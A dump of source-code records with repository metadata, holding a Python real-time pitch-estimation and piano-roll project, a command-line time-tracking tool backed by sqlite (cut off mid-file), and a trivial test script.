datetime.now().microsecond\n cTime += looplen/1000\n rollCanvas.delete(\"all\")\n rollCanvas.drawLines(cTime)\n drawUpcoming()\n millis2 = datetime.now().microsecond\n master.after(looplen,loop)\n\nmaster.after(looplen,loop)\nmaster.mainloop()" }, { "alpha_fraction": 0.5944055914878845, "alphanum_fraction": 0.5979021191596985, "avg_line_length": 18, "blob_id": "d7d78a458d776eaa3244dd137731829ffbf93245", "content_id": "b18551a6a5c6c89039c4d62c8cb2b27e331cda79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 286, "license_type": "no_license", "max_line_length": 70, "num_lines": 15, "path": "/filip/testpy/miditest.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from mido import MidiFile\nimport pyqtgraph as pg\n\n\nmidi = MidiFile(\"Vem_kan_segla.mid\")\n\nfor msg in midi:\n print(msg)\n\nnotes = []\ntimes = []\n\nfor msg in midi:\n if msg.type == \"note_on\" & msg.velocity == 0:\n print(\"Length: \" + str(msg.time) + \", Note: \" + str(msg.note))\n\n" }, { "alpha_fraction": 0.5911566019058228, "alphanum_fraction": 0.6150799989700317, "avg_line_length": 32.48618698120117, "blob_id": "b04b9ae843a64b799ae8647e8f31cd8617ffce6c", "content_id": "ae5ea961f6564ca76761f7c18a8a672e3bb36080", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6061, "license_type": "no_license", "max_line_length": 123, "num_lines": 181, "path": "/erik/pitchrt.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nimport numpy as np\nimport math\nimport inspect\n\n\nimport struct\nimport pyaudio\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\nfrom music21 import *\n\npg.setConfigOption('background', 'k')\n\ndef musicxml2notes(file):\n notes = []\n t = 0\n for element in file.flat.notesAndRests:\n tStart = t\n t+=element.seconds\n tEnd = t\n if element.isNote:\n notes.append((tStart, tEnd, element.pitch.freq440))\n return notes\n\npiece = converter.parse(\"Vem_kan_segla.musicxml\")\nnotes = musicxml2notes(piece)\n\ndef notesTimeMap(times,notes):\n timeNotes = np.zeros(len(times))\n curTime = 0\n for note in notes:\n while curTime < len(times) and times[curTime] < note[0]:\n curTime += 1\n while curTime < len(times) and times[curTime] < note[1]:\n timeNotes[curTime] = note[2]\n curTime += 1\n return timeNotes\n\n\nclass MyWidget(pg.GraphicsWindow):\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.simtime = 0\n\n self.loop = 0.2 # time between updates of plot in sec, not faster than 0.15-0.2\n nbr_pitch = 10 # number of pitches to look for in each loop\n nbr_sec = 10 # number of seconds to display\n\n self.setup_pyaudio(self.loop)\n self.setup_datavar(nbr_pitch, nbr_sec, self.loop)\n self.setup_plot(self.loop)\n\n def setup_pyaudio(self,loop):\n FORMAT = pyaudio.paInt16\n CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = int(loop*self.RATE)\n\n p = pyaudio.PyAudio()\n self.stream = p.open(\n format = FORMAT,\n channels = CHANNELS,\n rate = self.RATE,\n input = True,\n output = True,\n #stream_callback=self.audio_callback,\n frames_per_buffer=self.CHUNK\n )\n\n def setup_datavar(self,nbr_pitch,nbr_sec,loop):\n self.t = np.linspace(-nbr_sec,0,num=nbr_sec*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_sec*self.RATE)\n self.pitch = np.zeros(int(nbr_pitch/self.dt*self.RATE))\n self.tp = np.linspace(-nbr_sec,0,num=len(self.pitch))\n\n def setup_datavar2(self,nbr_pitch,nbr_sec,loop):\n self.t = np.linspace(-1,notes[-1,2],num=notes[-1,2]+1*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(loop/nbr_sec*self.RATE)\n self.pitch = np.zeros(int(nbr_pitch/self.dt*self.RATE))\n self.tp = np.linspace(-1,notes[-1,2],num=len(self.pitch))\n\n def setup_plot(self,loop):\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(loop*1000) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.onNewData2)\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\", row=1, col=0)\n self.plotSound = self.addPlot(title=\"Sound\", row=0, col=0)\n #self.plotSwipe.setLogMode(False,True)\n #self.plotSwipe.enableAutoScale()\n\n r2 = pg.QtGui.QGraphicsRectItem(0, -5, 3, 10)\n r2.setPen(pg.mkPen((0, 0, 0, 100)))\n r2.setBrush(pg.mkBrush((50, 50, 200)))\n self.plotSwipe.addItem(r2)\n\n self.plotPitches = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.plotNotesUpper = self.plotSwipe.plot([], pen=None,\n symbolBrush=(0,0,255), symbolSize=2, symbolPen=None)\n self.plotNotesLower = self.plotSwipe.plot([], pen=None,\n symbolBrush=(0,0,255), symbolSize=2, symbolPen=None)\n self.plotSound = self.plotSound.plot()\n\n\n\n # def audio_callback(self, in_data, frame_count, time_info, status):\n # audio_data = np.frombuffer(in_data, dtype=np.int16)\n # audio_data = audio_data.astype('float16')\n # self.sound = np.roll(self.sound,-len(audio_data))\n # np.put(self.sound,range(-len(audio_data),-1),audio_data)\n\n # return(in_data,pyaudio.paContinue)\n\n\n def onNewData2(self):\n noteTimes = notesTimeMap(self.tp+self.simtime,notes)\n self.simtime += self.loop\n self.plotNotesLower.setData(self.tp+5, [math.log(max(1,y)) for y in noteTimes/1.03])\n self.plotNotesUpper.setData(self.tp+5, [math.log(max(1,y)) for y in noteTimes*1.03])\n \n\n data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n data = data.astype('float64')\n\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n\n sw = swipe(data,self.RATE,self.dt,min=40,max=700,threshold=0.25)\n self.pitch = np.roll(self.pitch,-len(sw))\n np.put(self.pitch,range(-len(sw),-1),sw)\n \n self.plotPitches.setData(self.tp, [math.log(max(1,y)) for y in self.pitch])\n self.plotSound.setData(self.t, self.sound)\n\n \n\n def onNewData(self):\n # data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n data = np.frombuffer(self.stream.read(self.CHUNK,exception_on_overflow=False), dtype=np.int16)\n data = data.astype('float64')\n\n self.sound = np.roll(self.sound,-len(data))\n np.put(self.sound,range(-len(data),-1),data)\n\n sw = swipe(data,self.RATE,self.dt,min=40,max=700,threshold=0.25)\n self.pitch = np.roll(self.pitch,-len(sw))\n np.put(self.pitch,range(-len(sw),-1),sw)\n\n \n self.plotPitches.setData(self.tp, self.pitch)\n self.plotSound.setData(self.t, self.sound)\n\n\n\ndef main():\n app = QtWidgets.QApplication([])\n\n pg.setConfigOptions(antialias=True) # True seems to work as well\n\n win = MyWidget()\n for method in [method_name for method_name in dir(win) if callable(getattr(win, method_name))]:\n print(method)\n win.show()\n win.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5518072247505188, "alphanum_fraction": 0.5730923414230347, "avg_line_length": 31.763158798217773, "blob_id": "09c0bf07bbeaeff7c45df1a28924cc9a88e560b2", "content_id": "d419134f379d51d0d06db119de9a163c114acc05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7470, "license_type": "no_license", "max_line_length": 92, "num_lines": 228, "path": "/erik/test4.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "# plotting\nfrom PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\nfrom music21 import *\n\nimport pyaudio\nimport sys\nimport time\n\nimport multiprocessing as mp\nimport queue\n\nfrom pysptk.sptk import swipe\nimport numpy as np\nimport math\n\nglobal BASE\nBASE = np.log(2**(1/12))\n\n\n\nclass RTSwipe:\n def __init__(self,RATE=48000,CHUNK=6000,minfreq=50,maxfreq=1500,threshold=0.25):\n self.minfreq=minfreq\n self.maxfreq=maxfreq\n self.threshold=threshold\n\n CHANNELS = 1\n self.RATE = RATE\n self.CHUNK = CHUNK#2*2048\n self.swipesPerChunk = math.floor(CHUNK/(RATE*0.02)) # 20 ms per swipe estimate\n FORMAT = pyaudio.paInt16\n self.cnt = 0\n tsave = 10\n\n self.t0 = time.time()\n self.t = self.t0\n\n self.sound = mp.Queue()\n self.times = mp.Queue()\n self.swipes = mp.Queue()\n self.shutDown = mp.Queue()\n\n self.audio= pyaudio.PyAudio()\n self.stream = self.audio.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audioCallback,\n frames_per_buffer=self.CHUNK\n )\n self.process = mp.Process(target=self.swipeSound)\n self.process.start()\n\n print(\"Process started\")\n\n def audioCallback(self, in_data, frame_count, time_info, status):\n #print('in callback')\n sound = np.frombuffer(in_data,dtype=np.int16)\n times = np.linspace(self.t-self.t0,time.time()-self.t0,\n self.swipesPerChunk,True)\n self.t = time.time()\n self.sound.put(sound)\n self.times.put(times)\n #print(\"Sound len: \" + str(len(sound)))\n return(in_data,pyaudio.paContinue)\n\n def swipeSound(self):\n while True:\n if not self.shutDown.empty():\n break\n try:\n data = self.sound.get_nowait()\n except queue.Empty:\n #print('queue empty')\n time.sleep(0.04)\n else:\n #print(self.sound.empty())\n # self.cnt = 0\n #print('Data length: ', len(data))\n data = data.astype('float64')\n #print(len(data))\n t0 = time.perf_counter()\n sw = swipe(data, self.RATE, int(self.CHUNK/self.swipesPerChunk),\n min=self.minfreq, max=self.maxfreq,\n threshold=self.threshold)\n #print('swipe time: ', time.perf_counter()-t0)\n self.swipes.put(sw)\n #print('swipe length: ', len(sw))\n return True\n\n def getSwipes(self):\n if not self.swipes.empty():\n swipes = self.swipes.get_nowait()\n times = self.times.get_nowait()\n newSwipes = []\n newTimes = []\n for i in range(0,len(swipes)):\n if swipes[i] > 0:\n newSwipes.append(np.log(swipes[i]/8.17578)/BASE + 1/2)\n newTimes.append(times[i])\n return newSwipes, newTimes\n return [], []\n\n def exitHandler(self):\n print('in exit')\n self.audio.close(self.stream)\n self.shutDown.put(True)\n self.process.join()\n\n\nclass NotesWizard:\n def __init__(self, filePath):\n self.piece = converter.parse(filePath)\n\n self.timeSig = self.piece.flat.getElementsByClass(meter.TimeSignature)[0].numerator\n self.tempo = self.piece.flat.getElementsByClass(tempo.MetronomeMark)[0].number\n\n midimax = 0\n midimin = 9999\n t = 0\n for e in self.piece.flat.notesAndRests:\n setattr(e,\"time\",t)\n setattr(e,\"globBeat\",e.measureNumber+e.beat-2)\n if e.isNote:\n #print(e.pitch.midi)\n midimax = max(midimax,e.pitch.midi)\n midimin = min(midimin,e.pitch.midi)\n rect = pg.QtGui.QGraphicsRectItem(t, e.pitch.midi-1/2, e.seconds, 2**(1/12))\n rect.setPen(pg.mkPen((0, 0, 0, 100)))\n rect.setBrush(pg.mkBrush((127, 127, 127)))\n setattr(e,\"rect\",rect)\n t += e.seconds\n\n def getNotesAndRests(self):\n return self.piece.flat.notesAndRests\n\n def getTimeSig(self):\n return self.timeSig\n\n def getTempo(self):\n return self.tempo\n\n\nclass RollWindow(pg.GraphicsWindow):\n def __init__(self,sweeper,notesWizard,parent=None,updateInterval=20,timeWindow=10):\n super().__init__(parent=parent)\n self.notesWizard = notesWizard\n self.sweeper = sweeper\n self.updateInterval = updateInterval\n self.timeWindow = timeWindow\n self.t0 = time.time()\n self.t = 0\n self.mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(self.mainLayout)\n\n self.swipes = []\n self.times = []\n\n self.timer = QtCore.QTimer(self)\n self.timer.setInterval(updateInterval) # in milliseconds\n self.timer.start()\n self.timer.timeout.connect(self.update)\n\n timeSig = notesWizard.getTimeSig()\n tempo = notesWizard.getTempo()\n\n self.plotSwipe = self.addPlot(title=\"Swipe pitch estimates\")\n self.plotSwipe.setYRange(36, 83, padding=0)\n self.plotSwipe.setXRange(-timeWindow/2, timeWindow/2, padding=0)\n\n self.xAxisSwipe = self.plotSwipe.getAxis(\"bottom\")\n self.xAxisSwipe.setTickSpacing(major=60/tempo*timeSig, minor=60/tempo)\n self.yAxisSwipe = self.plotSwipe.getAxis(\"left\")\n self.rightAxisSwipe = self.plotSwipe.getAxis(\"right\")\n self.rightAxisSwipe.setTickSpacing(levels=[(12,-0.5), (1,-0.5)])\n\n majorTicks = []\n minorTicks = []\n for i in range(0,127):\n p = pitch.Pitch()\n p.midi = i\n if i%12==0:\n majorTicks.append((i-1/2, p.nameWithOctave))\n minorTicks.append((i-1/2, p.nameWithOctave))\n self.yAxisSwipe.setTicks([majorTicks,minorTicks])\n self.plotSwipe.showGrid(x=True, y=True, alpha=0.5)\n self.yAxisSwipe.setTickSpacing(levels=[(12,-0.5), (1,-0.5)])\n\n # Notes\n for e in notesWizard.getNotesAndRests():\n if e.isNote:\n self.plotSwipe.addItem(e.rect)\n # Swipe estimates\n self.plot_swipe_item = self.plotSwipe.plot([], pen=None,\n symbolBrush=(255,255,255), symbolSize=5, symbolPen=None)\n # Now line\n self.nowLine = pg.InfiniteLine(0,90)\n self.plotSwipe.addItem(self.nowLine)\n\n def update(self):\n newSwipes, newTimes = self.sweeper.getSwipes()\n self.swipes += newSwipes\n self.times += newTimes\n if len(self.swipes) > 0:\n self.plot_swipe_item.setData(self.times,self.swipes)\n dt = (time.time()-self.t0 - self.t)\n xRange = self.xAxisSwipe.range\n self.plotSwipe.setXRange(xRange[0]+dt, xRange[1]+dt, padding=0)\n self.t = time.time()-self.t0\n self.nowLine.setValue(self.t)\n\ndef main():\n app = QtWidgets.QApplication([])\n pg.setConfigOptions(antialias=False) # True seems to work as well\n\n sweeper = RTSwipe()\n wizard = NotesWizard(\"Vem_kan_segla.musicxml\")\n rollWindow = RollWindow(sweeper, wizard)\n app.aboutToQuit.connect(sweeper.exitHandler)\n rollWindow.show()\n rollWindow.raise_()\n app.exec_()\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6839622855186462, "alphanum_fraction": 0.7051886916160583, "avg_line_length": 14.071428298950195, "blob_id": "d9c50ee036498408612ee9fd9c8b73b344d4d7a0", "content_id": "aff70d1458bc3514b2bd1881c0968b17bbc24b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 424, "license_type": "no_license", "max_line_length": 56, "num_lines": 28, "path": "/README.md", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "# spektralmagi\n\n\n# Online pitch estimation:\n\npackages needed: \npysptk \nnumpy \npyaudio \nPyQt5 (or PyQt4 or pyside, with minor changes in code) \npyqtgraph \nmusic21 \n\nall available with pip install\n\n~~File to run at todays date (Mars 6th):\npitchrt.py~~\n\n~~file to run at todays date (April 27th):\npython/testpy/test7.py~~\n\nFile to run at todays date (May 3rd):\npython/app.py\n\n\nTodo: \nfix downsample?? \ntest crepe?? \n" }, { "alpha_fraction": 0.841269850730896, "alphanum_fraction": 0.841269850730896, "avg_line_length": 14.75, "blob_id": "6af8a45a9d847e20d3db613075b4488d849f426b", "content_id": "09ae8523419b5db767976f927f678733829b262e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/python/testpy/audiothread.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import threading\nimport pyaudio\nimport numpy as np\nimport time\n" }, { "alpha_fraction": 0.5866526961326599, "alphanum_fraction": 0.6170510053634644, "avg_line_length": 20.68181800842285, "blob_id": "3f7953c2de6f05124b815e2f5acfdb54f6cefe44", "content_id": "1382fc1f325316f8b09e5da6b15c4e91a55b62aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2862, "license_type": "no_license", "max_line_length": 78, "num_lines": 132, "path": "/python/testpy/tcanvas2.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport multiprocessing as mp\nimport time\nimport pyaudio\n\n\n# global variables\nfig = plt.figure(1)\n# first sub-plot\nax1 = fig.add_subplot(211)\nline1, = ax1.plot([], [], lw=2)\nax1.grid()\nxdata1, ydata1 = [], []\n# second sub-plot\nax2 = fig.add_subplot(212)\nline2, = ax2.plot([], [], lw=2)\nax2.grid()\nxdata2, ydata2 = [], []\n\n# the multiprocessing queue\nq = mp.Queue()\n\nFORMAT = pyaudio.paInt16\nnbr_chunks = 4\nCHANNELS = 1\nRATE = 44100\n# self.CHUNK = int(loop*self.RATE)\nCHUNK = nbr_chunks * 2048\n\np = pyaudio.PyAudio()\nstream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n stream_callback=audio_callback,\n frames_per_buffer=CHUNK\n)\n\n# data generator in separate process\n# here would be your arduino data reader\n\n\ndef dataGen(output):\n data = np.frombuffer(stream.read(\n CHUNK, exception_on_overflow=False), dtype=np.int16)\n output.put((x, np.sin(x)))\n\n\ndef audio_callback(self, in_data, frame_count, time_info, status):\n data = np.frombuffer(in_data, dtype=np.int16)\n\n\n# update first subplot\ndef update1(data):\n # update the data\n t, y = data\n xdata1.append(t)\n ydata1.append(y)\n xmin, xmax = ax1.get_xlim()\n\n ymin, ymax = ax1.get_ylim()\n\n if t >= xmax:\n ax1.set_xlim(xmin, 2 * xmax)\n if y >= ymax:\n ax1.set_ylim(ymin, 2 * ymax)\n if y <= ymin:\n ax1.set_ylim(2 * ymin, ymax)\n line1.set_data(xdata1, ydata1)\n\n return line1,\n\n# update second subplot\n\n\ndef update2(data):\n # update the data\n t, y = data\n xdata2.append(t)\n ydata2.append(y)\n xmin, xmax = ax2.get_xlim()\n ymin, ymax = ax2.get_ylim()\n\n if t >= xmax:\n ax2.set_xlim(xmin, 2 * xmax)\n if y >= ymax:\n ax2.set_ylim(ymin, 2 * ymax)\n if y <= ymin:\n ax2.set_ylim(2 * ymin, ymax)\n line2.set_data(xdata2, ydata2)\n\n return line2,\n\n# called at each drawing frame\n\n\ndef run(data):\n # get data from queue, which is filled in separate process, blocks until\n # data is available\n data = q.get(block=True, timeout=.5)\n # put here your variable separation\n data1 = (2 * data[0], 3 * data[1])\n data2 = (data[0], data[1])\n # provide the data to the plots\n a = update1(data1)\n b = update2(data2)\n fig.canvas.draw()\n return a + b\n\n\nif __name__ == \"__main__\":\n # count of reader processes\n n_proc = 1\n # setup workers\n pool = [mp.Process(target=dataGen, args=(q,)) for x in range(n_proc)]\n for p in pool:\n p.daemon = True\n p.start()\n\n # wait a few sec for the process to become alive\n time.sleep(3)\n\n # start your drawing\n ani = animation.FuncAnimation(fig, run, frames=60, blit=True, interval=10,\n repeat=False)\n plt.show()\n\n print('done')\n" }, { "alpha_fraction": 0.6686747074127197, "alphanum_fraction": 0.6897590160369873, "avg_line_length": 16.473684310913086, "blob_id": "ddb576cd91f9387f8f42db7aab0ef482af122ce2", "content_id": "f4af931ed0525690450c6a7409033e957e57d56c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "no_license", "max_line_length": 34, "num_lines": 19, "path": "/python/testpy/teststream.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "from streamplot import PlotManager\nimport numpy as np\nimport time\n\nlength = 10000\ncosts = np.arange(length)\n\nplt_mgr = PlotManager(\n\ttitle=\"plots\",\n\tnline=3)\n\nfor i in range(length):\n\tcost = costs[i]\n\tplt_mgr.add(\"cost\", cost)\n\tplt_mgr.add(\"time\", time.time())\n\tplt_mgr.add(\"time2\", time.time())\n\tplt_mgr.update()\n\nplt_mgr.close()\n" } ]
22
Mehal-MJ/MJMehal
https://github.com/Mehal-MJ/MJMehal
a38000b0ecdb6294605ff0cfec720c279e824240
41a85c85af0e93695d754cccbca73ee461dd904f
868df23217bc1bf8b0a14f3677812b5235904daf
refs/heads/master
2020-07-07T15:32:30.785046
2019-08-20T16:13:17
2019-08-20T16:13:17
203,391,070
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6551724076271057, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 13.5, "blob_id": "d7b8f3555dfb4e2c97be7e0e7e2fc1c3f8468718", "content_id": "840e66d405b78f6de0d538f3c03779262b49af97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29, "license_type": "no_license", "max_line_length": 16, "num_lines": 2, "path": "/trial.py", "repo_name": "Mehal-MJ/MJMehal", "src_encoding": "UTF-8", "text": "print(\"MJ\")\nprint(\"Forever\")\n" } ]
1
ateoto/timetracker
https://github.com/ateoto/timetracker
67b0a722a379cc43ebb3c480aae1ed65c580d775
1a9012caa22b3ce947d3b77d2c9f48b853a345c4
25317c91d5fd3bff8d1528c083c25040965c5ff3
refs/heads/master
2021-01-22T04:54:14.675822
2014-02-16T22:02:20
2014-02-16T22:02:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5901749730110168, "alphanum_fraction": 0.590847909450531, "avg_line_length": 38.1315803527832, "blob_id": "24aaa90fe2c60e6f53a6712370264430290d8ce4", "content_id": "1147e13b04bc92a7bb55f0832cd1245e23bcdd1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 89, "num_lines": 38, "path": "/timetracker/__init__.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "import argparse\n\nfrom .timetracker import TimeTracker\n\ndef process_commands():\n parser = argparse.ArgumentParser(description='Keep track of tasks and time.')\n parser.add_argument('action', help='Start/stop tracking, sync database to server.')\n parser.add_argument('taskname', nargs='?', help='Define a taskname to keep track of')\n\n parser.add_argument('--database', \n help='Specify a path for the database. You can also ' \\\n 'set the environment variable TT_DATABASE_PATH')\n\n parser.add_argument('--sync',\n help='TimeTracker will attempt to sync with the server. ' \\\n 'To avoid adding this everytime, you can set the environment '\\\n 'variable TT_ALLOW_SYNC to 1',\n action='store_true')\n\n parser.add_argument('--project',\n help='Specify a projectname to work on. To avoid ' \\\n 'setting this everytime, you can set the environment ' \\\n 'variable TT_PROJECT. Works well with virtualenv!')\n\n args = parser.parse_args()\n\n tt = TimeTracker(database_path=args.database, project=args.project)\n\n if args.action == 'start':\n tt.start(taskname=args.taskname)\n if args.action == 'stop':\n tt.stop(args.sync)\n if args.action == 'pause':\n tt.pause(args.sync)\n if args.action == 'status':\n tt.status()\n\n tt.close(sync=args.sync)" }, { "alpha_fraction": 0.6388888955116272, "alphanum_fraction": 0.6435185074806213, "avg_line_length": 26.0625, "blob_id": "68affae1fcb25f259d8ee85918d8eefa74ef5081", "content_id": "6e468e4cdde687c9501a6dee4d46d829172fb737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 432, "license_type": "no_license", "max_line_length": 64, "num_lines": 16, "path": "/setup.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name='TimeTracker',\n version='0.1',\n url='https://github.com/Ateoto/timetracker/',\n author='Matthew McCants',\n author_email='mattmccants@gmail.com',\n description=('A simple time tracking and management tool.'),\n license='BSD',\n packages=find_packages(),\n include_package_data=True,\n entry_points={'console_scripts': [\n 'tt = timetracker:process_commands',\n ]},\n)" }, { "alpha_fraction": 0.5263600945472717, "alphanum_fraction": 0.532568633556366, "avg_line_length": 34.86415100097656, "blob_id": "7bd4b78fd384768b12aa8547b498df4b58c4705b", "content_id": "30a80a2d95320b9d47eedbf54709a24949444811", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9503, "license_type": "no_license", "max_line_length": 197, "num_lines": 265, "path": "/timetracker/timetracker.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport datetime\nimport sqlite3\n\nclass Task:\n def __init__(self, rowid=None, projectid=None, name=None, starttime=None, stoptime=None, active=True, synced=False, paused=False):\n self.rowid = rowid\n self.projectid = projectid\n self.name = name\n self.starttime = starttime\n self.stoptime = stoptime\n self.active = active\n self.synced = synced\n self.paused = paused\n\n def _pretty_elapsed_time(self):\n if not self.stoptime:\n et = datetime.datetime.now() - self.starttime\n else:\n et = self.stoptime - self.starttime\n\n # Pretty Elapsed time: adapted from django.utils.timesince\n chunks = (\n (60 * 60, 'hours'),\n (60, 'minutes')\n )\n\n since = et.days * 24 * 60 * 60 + et.seconds\n for i, (seconds, name) in enumerate(chunks):\n count = since // seconds\n if count != 0:\n break\n pretty = \"%i %s\" % (count, name)\n\n if i + 1 < len(chunks):\n # Now get the second item\n seconds2, name2 = chunks[i + 1]\n count2 = (since - (seconds * count)) // seconds2\n if count2 != 0:\n pretty = \"%s, %i %s\" % (pretty, count2, name2) \n \n return pretty\n\n\n def start(self, connection):\n cursor = connection.execute('insert into tasks values(?,?,?,?,?,?,?)',\n self._tuple_values())\n connection.commit()\n self.rowid = cursor.lastrowid\n\n return self.rowid is not None\n\n def toggle_pause(self, connection):\n self.stoptime = datetime.datetime.now()\n self.active = False\n self.paused = not self.paused\n\n connection.execute('update tasks set stoptime=?, active=?, paused=? where rowid=?',\n (self.stoptime, self.active, self.paused, self.rowid))\n\n connection.commit()\n\n\n def stop(self, connection):\n self.stoptime = datetime.datetime.now()\n self.active = False\n self.paused = False\n\n connection.execute('update tasks set stoptime=?, active=?, paused=? where rowid=?',\n (self.stoptime, self.active, self.paused, self.rowid))\n\n connection.commit()\n\n def _tuple_values(self):\n return (self.projectid, \n self.name, \n self.starttime, \n self.stoptime, \n self.active, \n self.synced, \n self.paused)\n\n\n def __str__(self):\n return \"[%s] Elapsed Time: %s\" % (self.name, self._pretty_elapsed_time())\n\n def __repr__(self):\n return self.__str__()\n\nclass TimeTracker:\n def __init__(self, database_path=None, project=None):\n\n try:\n self.allow_sync = bool(int(os.getenv('TT_ALLOW_SYNC', default=False)))\n except ValueError:\n print('WARNING:')\n print('Please set TT_ALLOW_SYNC to 1 to allow syncing, or 0 to disallow syncing with the server.')\n print('Syncing has been disabled for this run.')\n self.allow_sync = False\n \n self.server = os.getenv('TT_SERVER_ADDRESS')\n self.api_token = os.getenv('TT_ACCESS_TOKEN')\n \n\n if project:\n # Command Line varianble takes precendence.\n self.projectname = project\n else:\n # Check the TT env variables\n tt_project = os.getenv('TT_PROJECT')\n if tt_project:\n self.projectname = tt_project\n else:\n # Are we in a virtual env?\n virtual_env = os.getenv('VIRTUAL_ENV')\n if virtual_env:\n self.projectname = os.path.basename(os.path.basename(virtual_env))\n else:\n # Just use the current working directory.\n self.projectname = os.path.basename(os.getcwd())\n\n # Set up directories, if they do not exist\n if database_path:\n if database_path == ':memory:':\n self.database_path = database_path\n else:\n self.database_path = os.path.abspath(database_path)\n if not os.path.exists(os.path.dirname(self.database_path)):\n os.makedirs(os.path.dirname(self.database_path))\n if not database_path:\n self.database_path = os.path.join(\n os.path.expanduser('~'), '.config', 'TimeTracker', 'tt.db')\n if not os.path.exists(os.path.dirname(self.database_path)):\n os.makedirs(os.path.dirname(self.database_path))\n\n\n self.con = sqlite3.connect(self.database_path, detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n self.con.execute('create table if not exists ' \\\n 'projects(name text, created datetime)')\n \n self.con.execute('create table if not exists ' \\\n 'tasks(project integer, name text, starttime timestamp, ' \\\n 'stoptime timestamp, active boolean, synced boolean, paused boolean)')\n\n result = self.con.execute('select rowid, * from projects where name=?', (self.projectname,))\n row = result.fetchone()\n if row:\n self.project_id = row[0]\n else:\n result = self.con.execute('insert into projects values(?,?)', \n (self.projectname, datetime.datetime.now(),))\n self.project_id = result.lastrowid\n\n self.con.commit()\n\n def _get_tasks_by_taskname(self, taskname):\n result = self.con.execute('select rowid, * from tasks where name=?', (taskname,))\n results = list()\n for row in result:\n t = Task(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n results.append(t)\n\n return results\n\n def _get_active_tasks(self):\n result = self.con.execute('select rowid, project, name, starttime as \"starttime [timestamp]\", stoptime as \"stoptime [timestamp]\", active, synced, paused from tasks where active=?', (True,))\n\n results = list()\n for row in result:\n t = Task(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n results.append(t)\n\n return results\n\n def _get_paused_tasks(self):\n result = self.con.execute('select rowid, project, name, starttime as \"starttime [timestamp]\", stoptime as \"stoptime [timestamp]\", active, synced, paused from tasks where paused=?', (True,))\n\n results = list()\n for row in result:\n t = Task(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7])\n results.append(t)\n\n return results\n\n def _sync(self, task_rowid):\n pass\n\n def start(self, taskname=None):\n results = self._get_active_tasks()\n\n if len(results) > 0:\n if taskname in [task.name for task in results]:\n print('You are already working on that task.')\n else:\n for task in results:\n response = input('Do you want to pause %s? [Y/n]:' % (task.name))\n if response.lower() != 'n':\n self.toggle_pause()\n self.start(taskname)\n else:\n if not taskname:\n taskname = 'Working on %s' % (self.projectname)\n\n task = Task(projectid=self.project_id,\n name=taskname,\n starttime=datetime.datetime.now(),\n active=True,\n synced=False,\n paused=False)\n if task.start(self.con):\n print('Started %s' % (taskname))\n\n\n def pause(self, sync=False):\n results = self._get_active_tasks()\n\n for task in results:\n task.toggle_pause(self.con)\n print('Paused %s' % (task.name))\n\n def stop(self, sync=False):\n active_results = self._get_active_tasks()\n\n if len(active_results) > 0:\n for task in active_results:\n 